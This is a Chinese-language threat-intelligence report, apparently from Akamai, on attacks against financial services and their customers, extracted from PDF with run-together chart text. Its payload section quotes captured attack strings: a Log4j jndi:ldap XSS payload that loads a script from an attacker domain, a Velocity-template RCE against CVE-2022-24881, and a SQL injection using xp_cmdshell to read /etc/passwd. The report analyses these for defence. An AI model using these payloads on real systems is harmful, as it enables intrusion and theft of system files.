1、互联网现状第 8 卷，第 3 期兵临城下针对金融服务领域的攻击分析目录前言威胁格局日益加剧的安全风险新披露的漏洞带来的危险DDoS 攻击金融服务业客户成为攻击目标网络钓鱼趋势恶意软件之路总结致谢名单246233兵临城下：第 8 卷，第 3 期 SOTI1前言金融服务业是遭受网络犯罪打击较为严重的行业之一。从 Zeus 和其他银行木马的猖獗时期，到分布式拒绝服务(DDoS)攻击、现代网络钓鱼攻击和勒索软件，攻击从未停歇。金融服务业是一个至关重要的行业，不仅与人们的日常生活息息相关，而且在全球经济中扮演着重要角色。金融服务的任何中断或停摆都将带来严重影响，而且这些机构的敏感数

2、据可能会被当作商品高价出售。因此，攻击者将金融服务机构视为有利可图的目标，所发起的攻击也是多种多样，从最新发现的零日漏洞攻击，到具有实效的网络钓鱼攻击不一而足。因此，攻击者高度专注并有动机攻击金融服务业已是公开的事实。一般情况下，有关金融服务业的互联网现状(SOTI)报告会选择网络钓鱼和欺诈等主题，但这次不同，我们采用了一种更广泛的方式，探讨了影响这一经常遭受攻击的行业的诸多问题。借助此更广阔的视角，我们看到金融服务业所遭受的攻击呈现激增态势，而且攻击者利用新发现的零日漏洞的速度惊人。金融服务业的客户也未能幸免，相当一部分攻击者选择放弃攻击这一安全防护程度极高的行业，转而集体攻击金融服务业的客

3、户。在这兵临城下之际，了解威胁态势如何变化对于金融服务业的安全专业人员而言至关重要。我们的报告包含以下几个要点：兵临城下：第 8 卷，第 3 期 SOTI2金融服务业受到的 Web 应用程序和 API 攻击、零日漏洞攻击以及 DDoS 攻击在易受攻击的目标垂直行业中一直位列前三。金融服务业受到的 Web 应用程序和 API 攻击以 3.5 倍的速率逐年激增，增长率明显高于其他主要行业。24 小时内，利用新发现的零日漏洞针对金融服务业发起的攻击可能高达每小时数千次并且迅速达到高峰，让人几乎没有时间去修补并做出反应。本地文件包含(LFI)和跨站点脚本(XSS)攻击大幅增加，表明攻击者正转向远程代码

4、执行(RCE)尝试，给内部网络安全带来更大压力。针对金融服务业客户的攻击十分猖獗，80%以上的金融服务领域攻击目标为客户帐户而不是机构本身，攻击者会通过直接盗取帐户或通过网络钓鱼相关活动发起攻击。网络钓鱼活动（例如 Kr3pto）所采用的技术可绕过使用一次性密码令牌或推送通知的双重身份验证(2FA)解决方案。概要兵临城下：第 8 卷，第 3 期 SOTI3威胁格局：针对金融服务业的攻击不断增加金融服务业仍然是全球受到攻击极为广泛的行业之一，并且攻击的数量呈增加态势。特别是 Web 应用程序和 API 攻击，不仅数量在以惊人的速度增长，而且复杂度也在不断提升。攻击者设法在内部网络中获得立足点并造

5、成中断，通过这种手段向企业施压，要求企业“破财免灾”，否则就会对其进行进一步的侵害。金融服务业是一个至关重要的行业，需要时刻保持正常运转。攻击者可能会将盗取到的敏感信息变现，也可能借此侵入客户 帐户，窃取其钱财。网络犯罪分子已经将目光投向了金融服务业及其客户，我们也因此观察到，这个垂直行业加强了网络安全意识，并投入了更多预算来增强网络安全。如果不能妥善保护安全边界和数据，勒索软件和其他威胁将会伺机而入，造成关键数据和财务方面的重大损失。IBM 在其2022 年数据泄露成本报告中指出，被视为“关键基础架构”的金融服务业的数据泄露成本平均高达 597 万美元。兵临城下：第 8 卷，第 3 期 SO

6、TI4为了全面了解金融服务业面临的各种风险，我们必须纵观整个威胁格局。为此，我们分析了大量相关活动数据，涉及的方面涵盖爬虫程序趋势（包括恶意和良性爬虫程序）、针对关键漏洞的漏洞利用尝试、Web 应用程序和 API 攻击以及网络钓鱼活动等。我们还探究了攻击者的互联网协议(IP)，从中得出有关攻击者动机的结论。通过对一整年的数据进行分析，我们汇总出了金融服务业威胁格局的概览（参见图 1）。笼统来看，金融服务业是受以下几种主要攻击最多的垂直行业之一：Web 应用程序和 API 攻击、DDoS、网络钓鱼、零日漏洞利用和僵尸网络活动。最令人担忧的是前文提及的 Web 应用程序和 API 攻击数量呈现惊人

7、的激增势头针对金融服务业的攻击数量年同比增加 3.5 倍。围绕金融服务企业展开的爬虫程序活动也在增加。图 1：按类型划分的金融服务业攻击增长情况 每种攻击媒介都带来了不同的安全风险和挑战，金融服务业必须一一应对才能增强自身的安全态势。在本报告中，我们将更详尽地审视各种攻击媒介，但总体而言，本报告论证了金融业网络安全投资的合理性。257%Web 应用程序和 API 攻击量增幅81%爬虫程序活动增幅22%DDoS 攻击目标增幅兵临城下：第 8 卷，第 3 期 SOTI5日益加剧的安全风险：应用程序和 API 攻击Web 应用程序和 API 依然是金融服务业的重要考虑因素。它们是许多转型工作的关键，

8、并会帮助银行向第三方保持开放，从而为客户缔造更优质的体验，并在市场上获得更多价值、占据更有利的竞争优势。另一方面，客户要通过银行应用程序来利用各种各样的银行服务。尽管在新冠疫情爆发之前，银行应用程序的使用已经在迅速增长，但疫情造成的客观环境（例如封锁）进一步推动了它们的使用。API 凭借显著的优势被诸多企业纳入生态系统。根据 Postman 的2022 年 API 现状报告，89%的受访者表示其有可能在这一年增加 API 开发投资。还有些企业为了遵守法规要求而采用 API。例如，欧洲的第二号支付服务指令要求欧洲银行公开 API，让金融服务提供商能够访问与贷款、帐户等方面相关的客户数据。借助 A

9、PI，银行和第三方实现了双方之间数据连接、客户财务信息交换的标准化。另一方面，Web 应用程序凭借为客户提供的便利性、更快的处理速度和出色的可靠性增强了客户体验，也帮助金融服务企业降低了成本。但这些 Web 应用程序内的漏洞可能会让攻击者得以入侵系统、窃取敏感数据。API 和 Web 应用程序固然有许多优势，但也有可能引入新的攻击面，给网络犯罪分子留下可乘之机。在过去 12 个月中，Web 应用程序和 API 攻击数量显著增加，而金融服务业依然是一大主要攻击目标行业。在分析中，我们发现金融服务业是遭受攻击次数第三多的垂直行业，在所有攻击中，有 15%针对的是金融服务业，紧随排名第二位的高科技行

10、业之后（参见图 2）。在这一年的大部分时间中，金融服务业的受攻击次数都要超过高科技行业。笼统来看，金融服务业是受以下几种主要攻击最多的垂直行业之一：Web 应用程序和 API 攻击、DDoS、网络钓鱼、新型漏洞利用和僵尸网络活动。兵临城下：第 8 卷，第 3 期 SOTI6图 2：在过去 12 个月，Web 应用程序和 API 攻击的主要目标行业包括商业、高科技行业和金融服务业Web 应用程序和 API 在金融服务业的运营中至关重要，这继续吸引着攻击者寻找各种漏洞和途径对金融服务企业发起攻击。首先，Web 应用程序构建之时的安全性就是一项艰巨的挑战。这些 Web 应用程序中一旦留有漏洞，就会造

11、成 RCE 和入侵。其次，Web 应用程序能够捕获和存储客户的机密信息（例如登录凭据）。如果攻击者成功发起 Web 应用程序攻击，他们就能窃取机密数据，在更严重的情况下，甚至能获得网络的初始访问权限，并进而获得更多凭据，借此实现横向移动。除了入侵的隐忧之外，被盗信息还可能流入黑市，或用于发起其他攻击。鉴于金融服务业拥有大量的高价值数据，例如个人身份信息和帐户详细信息等，这一点尤为令人担忧。针对金融服务业的 Web 应用程序和 API 攻击呈现上升趋势，这表明攻击者对金融服务业及其客户的兴趣有增无减。今年，针对金融服务业的应用程序和 API 攻击增加了 3.5 倍。这在所有行业的年同比增幅中排名

12、第一，但此排名并未统计博彩业，因为总体上并未看到针对博彩业有大量的 Web 应用程序防火墙(WAF)攻击。这样的增长体现出，攻击者越来越关注可能带来金融服务业入侵机会的攻击面。各行业的 Web 应用程序和 API 攻击垂直行业0%10%20%30%40%商务高科技金融服务视频媒体制造其他数字媒体公共部门社交媒体游戏商业服务博彩制药/医疗保健非营利性组织/教育兵临城下：第 8 卷，第 3 期 SOTI7图 3：过去 12 个月中，金融服务业遭受的攻击数量持续增加在过去 12 个月中，金融服务业遭受的攻击数量持续增加，图 3 中的峰值似乎表明，攻击有着明确的目标或重点。更重要的是，这些模式或许表明

13、，企业面临的 Web 应用程序攻击的风险与日俱增。Positive Technologies 开展的一项研究表明，91%的 Web 应用程序发生过个人数据（如用户 ID 和用户凭据）泄露事件。Web 应用程序中的漏洞可能被用作入侵目标机构的入口点，因此保护 Web 应用程序势在必行。通过了解攻击类型及其可能导致的后果，企业即可确定如何妥善保护这些 Web 应用程序。每日 Web 应用程序和 API 攻击金融服务业攻击次数兵临城下：第 8 卷，第 3 期 SOTI8区域级趋势我们可以观察区域级趋势，比较全球不同区域的攻击增长情况（参见图 4）。图 4：亚太地区及日本(APJ)的 Web 应用程序

14、和 API 相关攻击大幅增长，增幅达 449%值得注意的是，拉丁美洲(LATAM)遭受的攻击呈现指数级增长。数字化的普及以及有限的网络犯罪治理或许是导致该区域网络犯罪活动日渐增多的两大因素。该区域每年因网络犯罪蒙受的损失达 900 亿美元。该区域面临的主要威胁包括加密劫持、欺诈、银行木马和勒索软件，这表明拉丁美洲区域的网络犯罪动机多以经济利益为主。就在今年，哥斯达黎加遭受 Conti 团体发起的勒索软件攻击，数个政府网站遭到攻击，这体现出勒索软件即服务(RAAS)的重大影响不仅限于经济损失。仔细观察该区域的数据，可以看到巴西在 Web 应用程序和 API 攻击目标中位列榜首。巴西的网上银行使用

15、率/普及度较高，也存在许多银行相关威胁。亚太地区和日本的 Web 应用程序和 API 攻击数量也有大幅增长，增幅高达 449%，这似乎与该区域内网络攻击数量的激增相呼应，而这主要也体现于勒索软件攻击的增加。今年早些时候，我们发现勒索软件团体经常使用 Web 应用程序和 API 攻击媒介，利用各种漏洞从而获得初始访问权限。澳大利亚、日本和印度是这一区域中遭受 Web 应用程序和 API 攻击最多的三个国家。区域趋势攻击次数2022202222区域拉丁美洲欧洲、中东和非洲亚太地区及日本北美兵临城下：第 8 卷，第 3 期 SOTI9再看北美(NA)的情况

16、，我们观察到 Web 应用程序和 API 攻击数量增幅达到 354%的峰值。2022 年初，俄乌冲突爆发，引发美国和欧洲金融业可能遭受网络攻击和打击报复的预警。但在此之前，美国金融服务公司也未曾摆脱过勒索软件、银行木马和其他恶意软件的侵扰。部分显著的攻击包括 FIN8 网络犯罪团体侵入数家美国金融服务公司，以及 40 万份泄露的 美国和韩国银行支付记录流入黑市。网络安全风险无处不在，为了降低风险，2021 年，美国联邦存款保险公司(FDIC)、美国联邦储备系统管理委员会和美国货币监理署敲定了一项 规则，要求在疑似遇到威胁期间向联邦监管机构和银行机构的客户发出“事件通报”。与美国相似，欧洲也出台

17、了相关立法和数项法规，如网络和信息系统安全指令（NIS 指令）和通用数据保护条例(GDPR)，为金融服务业和其他垂直行业提供有关网络安全和数据保护的指导与基准。这些法规确实能帮助企业提高应对网络风险的韧性，但即便遵循其规定形式，企业也未必就能对网络攻击免疫。许多网络威胁促成了这种情况，其中一些显著的例子包括 Bizarro，这是一种银行木马，其攻击目标现已拓展到欧洲各银行，还有许多移动恶意软件的攻击/攻击负载传递尝试次数增幅达到了惊人的 500%。在欧洲、中东和非洲(EMEA)区域，英国遭受的 Web 应用程序和 API 攻击次数最多。这一数据表明，犯罪组织不断为攻击金融业而投入人力物力。如今

18、，他们在利用自动化机制、侦察手段以及迭代方法来规避地理拦截等规则。为此，金融业有必要持续细化安全规则和风险承受力，并确保通过一种通用的安全产品组合保护所有面向互联网的功能。兵临城下：第 8 卷，第 3 期 SOTI10应用程序和 API 攻击中使用的攻击媒介为了解攻击的性质，我们可以深入审视针对此行业的攻击常用的媒介。企业非常有必要审视这些媒介，从而更好地了解您面临的风险以及可能遭遇的攻击类型。掌握这些信息后，您就可以设计抵御策略来加强对这些攻击的防御，防范入侵。图 5：LFI 攻击是 WAF 攻击数量大幅增加的推动因素之一 如图 5 所示，Web 应用程序和 API 攻击的增长主要源自 LF

19、I 和 XSS。不同于 SQL 注入攻击，攻击者利用 LFI 和 XSS 攻击的目的通常是在目标网络中获得立足点，而非直接访问数据库。攻击者不断使用自动化工具扫描互联网，从而寻找潜在目标。LFI 攻击则让攻击者能够验证目标企业是否存在漏洞。此外，攻击者可能会将恶意代码注入 Web 服务器，利用 LFI 漏洞实施远程代码执行，攻击系统的安全机制。更糟糕的是，攻击者还能利用 LFI 获取敏感信息。通过不同媒介发起的 Web 应用程序和 API 攻击PHPiRFICMDiJSILFISQLiXSS250,000,000200,000,000150,000,000100,000,00050,000,0

20、00300,000,000兵临城下：第 8 卷，第 3 期 SOTI11XSS 也会给企业带来安全威胁。攻击者可利用 XSS 漏洞将代码注入网站，后续在用户每次访问被入侵的网站时，都会面临信息泄露的风险。另外还有一种类型的 XSS，攻击者通过恶意链接诱使受害者下载攻击负载，以此实施攻击。攻击者通常利用这种媒介发起网络钓鱼攻击以及网站篡改攻击。金融服务业中的 Web 应用程序和 API 攻击数量激增令人担忧，尤其是考虑到其安全隐患。清晰了解攻击面和攻击媒介可以帮助金融服务企业保护其网络环境。攻击负载在本部分中，我们将展示针对金融服务业的真实攻击尝试。攻击负载通常混合使用多种攻击媒介和漏洞，包括近

21、期的 CVE。在图 6 到图 10 中，您可以看到有些攻击专门针对其预期目标定制，其他一些攻击则不那么具体，用于实施侦察。定制创建的 XSS 攻击负载图 6：攻击者发送的 XSS 攻击负载（经过编码的形式）图 7：攻击者发送的 XSS 攻击负载（经过解码的形式）在 URL 解码之后，XSS 攻击负载就会从攻击者控制的网域下载并运行恶意脚本。该脚本似乎是针对特定目标人工定制的。此外，该攻击负载让攻击者能够利用 Log4j(CVE-2021-44228)等 OGNL 漏洞来运行脚本。a=%3Cscript%20src%3D%24%7Bjndi%3Aldap%3A%2F%2FREDACTED.com

22、.80.s.mur.5ed.xyz%3A53%2FREDACTED.com%7D%3Ealert()%3C%2Fscript%3Ea=alert()兵临城下：第 8 卷，第 3 期 SOTI12混用多种攻击方法图 8：攻击者尝试了多种攻击技术（经过解码的形式）另一方面，如图 8 所示，攻击者执行 SQL 注入，暴露了有关目标数据库的敏感信息。此外，攻击者还利用了一个 LFI 漏洞，尝试使用 Unix cat 命令转储敏感的 etc/passwd 文件的内容。这里还出现了另外一种 XSS 攻击探测方法，攻击者尝试确定网站是否存在 XSS 漏洞。在扫描/侦测阶段，攻击者通常会同时测试目标系统中是否

23、存在多个漏洞。持久驻留图 9：攻击负载尝试利用 CVE-2022-24881 RCE 漏洞图 10：CVE-2022-24881 的解码版最后，如图 9 所示，攻击负载企图利用在 Ballcat Codegen 软件中发现的 CVE-2022-24881 RCE 漏洞。一名攻击者尝试通过 Velocity 模板引擎的恶意代码注入来实施 RCE 攻击。具体来说，该攻击者转储了/etc/profile Unix 文件的内容，这个文件的用途是在用户的 shell 上设置系统级环境变量。攻击者的目的是探查系统中的漏洞，并尝试通过操纵 Unix 文件实现持久驻留。q=1&wt=velocity&v.te

24、mplate=custom&v.template.custom=#set($x=%27%27)+#set($rt=$x.class.forName(%27java.lang.Runtime%27)+#set($chr=$x.class.forName(%27java.lang.Character%27)+#set($str=$x.class.forName(%27java.lang.String%27)+#set($ex=$rt.getRuntime().exec(%27cat%20/%65%74%63/%70%72%6f%66%69%6c%65%27)+$ex.waitFor()+#setv

25、$out=$ex.getInputStream()+#foreach($i+in+1.$out.available()$str.valueOf($chr.toChars($out.read()#endq=1&wt=velocity&v.template=custom&v.template.custom=#set($x=)#set($rt=$x.class.forName(java.lang.Runtime)#set($chr=$x.class.forName(java.lang.Character)#set($str=$x.class.forName(java.lang.String)#set

26、($ex=$rt.getRuntime().exec(cat/etc/profile)$ex.waitFor()#set($out=$ex.getInputStream()#foreach($i in 1.$out.available()$str.valueOf($chr.toChars($out.read()#endqkSO=9983 AND 1=1 UNION ALL SELECT 1,NULL,alert(“XSS”),table_name FROM information_schema.tables WHERE 21-/*/;EXEC xp_cmdshell(cat./././etc/

27、passwd)#兵临城下：第 8 卷，第 3 期 SOTI13新披露的漏洞带来的危险企业应该高度重视应用程序和 API 攻击，这不仅意味着要对采用 LFI、SQLi 和 XSS 方法的普通攻击严加防守，还要求他们密切留意新披露的漏洞（比如近期的 Log4Shell、Spring4Shell 和其他类似漏洞）。LFI 和 XSS 确实十分常见，可能带来严重安全威胁，但攻击者往往会通过大量鲜为人知的攻击媒介（如 OGNL 注入）利用新出现的重大漏洞，并给企业造成更高的入侵风险。我们一直以来给企业的建议就是及时修补漏洞，尽可能减少暴露在风险下的时长。但及时修补并非总是那么容易修补程序必须经过测试才能

28、部署，确定应该优先修补的漏洞也需要一定的时间，一旦修补失败，更是会耗费时间。因此，您需要抢在攻击者开始利用这些安全漏洞发起攻击之前解决这些漏洞。举例来说，根据报道，Microsoft 披露其 Exchange Server 零日漏洞的五分钟后，Hafnium 黑客团体就已经开始扫描这些漏洞。为了了解风险水平，我们对近期的一个漏洞开展了分析，了解攻击者如何利用此漏洞向金融服务业发起攻击。在对新型漏洞开展的研究中，我们发现金融服务业几乎始终名列受影响行业的前三名，而这些攻击这带来的风险非常惊人。为了印证这一点，我们分析了近期的 Confluence Server 漏洞(CVE-2022-26134

29、)，其严重性分数是 9.8，当然，其他新漏洞也存在重大风险，比如 Log4j。2022 年 6 月 2 日，Atlassian 发布了一则安全公告，称一个 RCE 漏洞影响其 Confluence Server 和 Confluence Data Center 产品。在此前的一篇博文中，我们曾提到，在公告发布后的数天内，对于该漏洞的利用尝试数量不断增加。在本报告中，我们仔细研究了利用这一重大漏洞对金融服务业发起的攻击尝试。在这里，有必要强调攻击者如何迅速利用此类安全漏洞实施攻击，以及企业若未能妥善保护安全边界时，可能会受到哪些负面影响。兵临城下：第 8 卷，第 3 期 SOTI14 图 11：

30、在 2022 年 6 月的 Confluence 事件中，遭受攻击的 Akamai 客户的行业细分在之前那篇博文中，我们指出商业、高科技和金融服务业这三个垂直行业遭受的攻击数量占总数的 75%以上。现在，我们再来看看，从漏洞利用尝试次数来看，金融服务业与前三以外的所有其他行业的对比情况，这些行业有视频媒体、公共部门、数字媒体、制造、博彩、商业服务、制药/医疗、游戏、社交媒体和非营利/教育等。值得一提的是，金融服务业遭受的攻击尝试次数等于排在其后面的全部 11 个行业的总和（参见图 11）。最常受到攻击的几大行业Confluence 漏洞其他数字媒体 1.1%博彩 0.8%商业服务 0.6%非营

31、利性组织/教育 0.09%制药/医疗保健 0.3%公共部门 0.9%金融服务视频媒体制造社交媒体游戏商务高科技兵临城下：第 8 卷，第 3 期 SOTI15图 12：CVE-2022-26134 漏洞利用尝试WAF 触发次数图 12 和图 13 具体展示了针对金融服务垂直行业的 Confluence 漏洞利用尝试次数。数据分析结果表明，在漏洞披露后不到 48 小时的时间里，针对金融服务业的攻击尝试次数达到峰值，每小时尝试次数达到 5,900 次，攻击者使用的唯一 IP 地址多达 4,800 个。漏洞利用尝试的总体峰值是在 2022 年 6 月 7 日 18:00（UTC 时间）记录到的，达到了

32、每小时 7.89 万次尝试，体现出这可能是一次目标明确的攻击。2022 年 6 月 4 日，我们也观测到一次显著峰值。图 13：CVE-2022-26134 漏洞利用尝试 WAF 触发次数（6 月 3 日至 6 月 23 日详细视图）漏洞利用尝试次数2022/5/222022/5/292022/6/52022/6/62022/6/19SAP SCIMonoApache StrutsConfluence漏洞利用尝试次数（详细视图）02000400060008000100002022/5/202022/5/222022/5/242022/5/262022/5/282022/5/302022/6/1

33、2022/6/32022/6/52022/6/72022/6/92022/6/112022/6/132022/6/152022/6/172022/6/192022/6/212022/6/23兵临城下：第 8 卷，第 3 期 SOTI16达到这种利用速率的漏洞不只有这一个，我们还观察到利用新漏洞或零日漏洞向金融服务业发起类似“猛攻”的其他情况，Log4j 漏洞就是其中一例。这似乎表明，利用新爆出的漏洞是一种经过实践检验的有效网络入侵方法，而在利用新漏洞发起攻击时，攻击者永远不会忘记金融服务业这个高收入的攻击目标。企业必须不断更新系统和应用程序，加强自身的网络安全态势。图 14：CVE-2022-

34、26134 漏洞利用尝试唯一 IP 数量Confluence 漏洞只是攻击者利用新漏洞快速入侵企业的诸多示例之一。重要的是，在保护面向互联网的资产时，企业应该选用支持其监测和阻止 Web 应用程序和 API 攻击的工具，还要定期修补系统，从而防范此类攻击。在出现漏洞时，分分秒秒都至关重要。为了避免遭到入侵，网络安全从业者必须考虑需要采取哪些步骤来缓解漏洞，例如实施 WAF 等安全机制来检测恶意流量、采用可靠的补丁管理，以及制定网络响应措施。唯一 IP 数图 14：CVE-2022-26134 漏洞利用尝试唯一 IP 数2022/5/222022/5/292022/6/52022/6/12202

35、2/6/19兵临城下：第 8 卷，第 3 期 SOTI17DDoS 攻击：区域目标的转移在俄乌冲突期间，DDoS 攻击在针对金融机构发起的攻击中表现得尤为显著。在 2022 年 3 月俄乌正式开战之前，似乎先是爆发了一场“网络战争”，2022 年 2 月，双方发动了一系列 DDoS 攻击，破坏政府和银行网站、扰乱公民的正常生活，并造成破坏。近期，亲俄攻击团体 REvil、Killnet、DDoS Empire 和 RootSploit 已明确将金融服务业作为其攻击目标。在此之前，Killnet 曾对美国机场发起多次 DDoS 攻击，但机场运营并未受到影响。图 15：金融服务业是遭受 DDoS

36、攻击次数第二多的垂直行业在过去 12 个月中，金融服务业的 DDoS 攻击目标数量增加了 22%。致使这一行业成为最常遭受 DDoS 攻击的第二大目标行业，仅次于游戏业（参见图 15）。在各个垂直行业中，攻击者可能会尝试攻击更广泛的目标，并在不同目标之间快速移动，从而绕过防御机制。DDoS 攻击占比靠前的几大行业0%10%20%30%40%游戏金融服务高科技制造博彩商务制药/医疗保健非营利性组织/教育视频媒体商业服务公共部门其他数字媒体社交媒体今年，针对金融服务业的 DDoS 攻击量保持稳定，但我们观察到了“区域转移”，即针对美国的 DDoS 攻击量已在减少。与此同时，尽管针对欧洲、中东和非洲

37、地区的攻击目标总数较少，但攻击量已在增加。兵临城下：第 8 卷，第 3 期 SOTI18 图 16：全球金融服务业每天遭遇的攻击次数DDoS 攻击数量虽然保持稳定（参见图 16），但攻击的区域转移值得注意。如果仔细观察年同比增长，就能看出这样的迹象：在大多数攻击类型中，美国似乎都是排名靠前的攻击目标，但近几个月来，针对美国发起的 DDoS 攻击数量有所下降。与此同时，尽管针对欧洲、中东和非洲地区的攻击目标总数较少，但该区域仍然排名靠前。每日 DDoS 攻击次数金融服务业2022/10/12022/9/12022/8/12022/7/12022/6/12022/5/12022/4/12022/3

38、/12022/2/12022/1/12021/12/12021/11/12021/10/1兵临城下：第 8 卷，第 3 期 SOTI192021 年，北美是遭受攻击最多的地区(54.50%)，其次是欧洲、中东和非洲(37.61%)。然而，在 2022 年，欧洲、中东和非洲地区针对金融服务业的 DDoS 攻击在攻击总量中所占比例上升至 73.30%，而北美地区的相同指标下降至 22.14%（参见图 17）。图 17：DDoS 攻击占比最高的区域（2021 年与 2022 年初至今数据的对比）促成这种变化的可能因素之一就是仍在持续当中的俄乌战争。有报道称，针对英国金融公司发起的 DDoS 攻击和其

39、他针对表态支持乌克兰的西欧国家的网络攻击数量不断上升。在战争爆发的几个月后，亲俄黑客团体 Killnet 还对意大利参议院、国家卫生研究院和其他机构的网站发起了攻击。这些 DDoS 攻击的目的可能是对乌克兰支持者进行打击报复这是地缘政治外溢到网络空间的一个示例。DDoS 攻击会给金融服务业的业务运营造成严重破坏。对企业而言，停机、业务中断以及从此类攻击中恢复，都可能意味着经济损失。当银行受到 DDoS 攻击时，其网站和服务可能会离线，并且可能给客户和业务运营造成影响。大体上，DDoS 攻击一旦得逞，就会造成企业与互联网其他部分的断联、客户无法访问帐户，企业可能因此蒙受损失。此外，根据 Gart

40、ner 的数据，IT 停机的每小时平均成本约为 5,000 美元到 140,000 美元不等。各区域的 DDoS 攻击次数20212022 年攻击次数20222202220%20%60%80%40%欧洲、中东和非洲北美拉丁美洲亚太地区及日本区域兵临城下：第 8 卷，第 3 期 SOTI20成为此类攻击受害者的后果包括工作效率受损、品牌声誉蒙羞，而这可能意味着失去客户信任，还有可能被处以巨额罚款。因此，攻击者会利用 DDoS 攻击作为工具，向成为目标的企业勒索钱财。攻击者可能使用 DDoS 作为“烟幕”，同时发动其他攻击，窃取客户帐户信息等敏感数据。在

41、拿到这些数据后，网络罪犯就可以创建虚假帐户或接管客户帐户，并转移或窃取资金。这进一步强调了保护安全边界、保持良好网络安全习惯对于降低 DDoS 攻击的风险的重要性。我们可以提供的最重要建议之一就是，在重大活动之前或在预先指定的日期查看行动手册。陈旧过时的联系人或不了解共同角色、共同职责的新员工可能会浪费时间，将原本的小事件变成重大安全事故。您需要抢在攻击者开始利用这些安全漏洞发起攻击之前修复这些漏洞。兵临城下：第 8 卷，第 3 期 SOTI21金融服务业客户成为攻击目标从早期银行木马和诈骗猖獗的时期到现代网络钓鱼攻击，多年来，银行客户一直是网络犯罪的受害者。网络犯罪对个人的影响不一而足，包括

42、身份盗窃和经济损失等。网络罪犯可能会冒充用户开通信用卡或申请贷款；更糟糕的是，以用户的名义犯罪、在暗网上出售其身份信息等。考虑到网络犯罪对个人的重大破坏性影响，金融机构必须妥善保护其客户信息的安全。为了解相关风险，以及金融客户遭受攻击的风险敞口，我们通过 Akamai 系统中的 Client Reputation，对各类攻击者开展了更深入的研究（参见图 18）。这让我们得以深入了解攻击方法和动机，也知晓了攻击者在攻击金融服务机构时的关注重点。图 18：Client Reputation 情报，针对整个金融服务业发起攻击的 IP 地址的分布情况Client Reputation 情报分布拒绝服务

43、攻击者扫描工具网络爬虫帐户接管Web 攻击者兵临城下：第 8 卷，第 3 期 SOTI22这五个大类分别是：帐户接管在这种攻击中，网络犯罪分子使用窃取到的密码和用户名接管在线帐户所有权 网络抓取工具这种自动化工具通过系统化方式从网页中获取信息（如网站格式和内容）；通常用于复制网站，以实施网络钓鱼攻击和诈骗 扫描工具这些工具用于在攻击的侦测阶段扫描 Web 应用程序漏洞 拒绝服务攻击者使用自动化工具发起大规模 DoS 攻击的 Web 客户端或僵尸网络 Web 攻击者执行面向 Web 的一般攻击（如 SQLi、远程文件包含(RFI)或 XSS）的 Web 客户端或攻击者图 18 揭示出耐人寻味的视

44、角：我们观测到大量的 DDoS 攻击、漏洞利用和 Web 应用程序攻击，超过 80%的攻击者将其攻击瞄准金融服务业的客户，而非机构本身。帐户接管攻击直接以客户为目标，而网站内容抓取攻击主要用于制造网络钓鱼骗局，以及构建精细仿冒网站的工具包。金融服务企业拥有强大的安全措施和较高的网络安全意识，可抵御针对其机构发起的此类攻击。因此，网络犯罪分子通常会寻找阻力最小的路径，并且会锁定更容易成为受害者的客户。虽然诈骗不一定是金融服务企业的错，但其客户遭受的诈骗也有可能给其业务带来损失。这可能会损害其声誉和品牌，还会造成客户信任流失，进而造成经济损失。帐户接管部分(42%)以金融机构为目标的攻击者 IP

45、都与帐户接管有关，这进一步印证了我们的观点。在金融服务业背景下，帐户接管造成的危险可能不仅限于个人。如果帐户接管攻击导致客户遭遇未经授权的交易，可能会给银行造成收入损失。据报道，帐户接管欺诈造成的代价高达每年 114 亿美元。客户服务或许能为受害者提供帮助并帮助其解决问题（过错方不一定是机构），但这也要耗费银行的资源和时间。兵临城下：第 8 卷，第 3 期 SOTI23爬虫程序活动量增加 81%，在遭遇帐户接管攻击的帐户中，爬虫程序发挥了主要作用。网络犯罪分子利用爬虫程序，通过自动组合不同的用户名和密码来实施撞库，从而接管帐户。撞库所用凭据通常是数据泄露事件中被盗取的数据。2022 年 5 月

46、到 8 月，僵尸网络 活动量在金融服务业持续攀升，这并不令人意外（参见图 19）。图 19：针对金融服务业的爬虫程序数量激增，这与帐户接管和网络内容抓取攻击数量的增加紧密相关此外，爬虫程序数量的增长大多归因于已知的 Web 自动化库，也就是说，爬虫程序的操控者在利用通用工具包来获取数据并实施帐户接管攻击。成功接管帐户的攻击者可以先将帐户洗劫一空，再将用户信息拿到黑市上兜售。截至 2021 年，网上银行登录凭证在暗网上的平均价格为 40 美元。帐户接管带来了极大的风险。如果用户有重复利用密码的习惯，他们的其他帐户也可能会相继沦陷，更糟糕的是，攻击者可能会冒充他们的名义，伤害他们的联系人。不同类型

47、的爬虫程序数量攻击次数良性爬虫程序恶意爬虫程序兵临城下：第 8 卷，第 3 期 SOTI24网络抓取工具在我们的 Client Reputation IP 数据中，我们还观察到大量的网络抓取工具。这些工具通常用于提取存储在网站中的数据，从而精准地创建可冒充金融服务机构网站的网络钓鱼工具包，对客户实施欺诈。在帐户接管中，爬虫程序还会发挥网络内容抓取的作用。跟踪战术、技术和程序为了更好地了解攻击者可能使用哪些战术、技术和程序(TTP)来给客户造成伤害、对企业发起攻击，审视攻击者的动机非常重要。通过跟踪这方面的长期指标，企业就能获得客户风险敞口的威胁情报，同时还能借此评估需要实施哪些安全措施（例如，

48、Akamai MFA、Akamai Account Protector 和 Akamai Bot Manager），以帮助降低风险。我们希望通过对这些攻击方法和动机分类带给您些许启迪，帮您在企业内开展相关演练并分析攻击趋势。我们观测到大量的 DDoS 攻击、漏洞利用和 Web 应用程序攻击，超过 80%的攻击者将其攻击瞄准金融服务业的客户，而非机构本身。兵临城下：第 8 卷，第 3 期 SOTI25网络钓鱼趋势：金融服务客户面临着严峻的攻击 形势金融服务是最常遭受网络钓鱼诈骗的目标行业之一。大多数网络钓鱼攻击的动机都在于谋求经济利益，每分钟因此类攻击而产生的经济损失高达 17,700 美元。对

49、金融服务业及其客户发起的网络钓鱼攻击一旦得手，就能收获丰厚的回报，这是这一行业成为攻击重灾区的诸多原因之一。例如，信用卡详情的黑市价格从 17 美元到 120 美元不等，网络犯罪分子可以通过攻击大量客户，谋取大量钱财。网络钓鱼工具包在黑市中定价低廉，这降低了网络犯罪分子对预期目标发起攻击的难度。这些网络钓鱼攻击的主要目标是金融机构的客户，而非机构本身，但深受其害的方面绝不只有个人。如果网络犯罪分子冒充金融服务机构，银行的品牌和声誉可能因此而受损，而这也会破坏客户对银行的信任（并导致银行失去客户的业务）。在网络钓鱼攻击得逞之后，修复和管理其造成的影响需要投入资源，这也会使银行蒙受损失。我们调查了

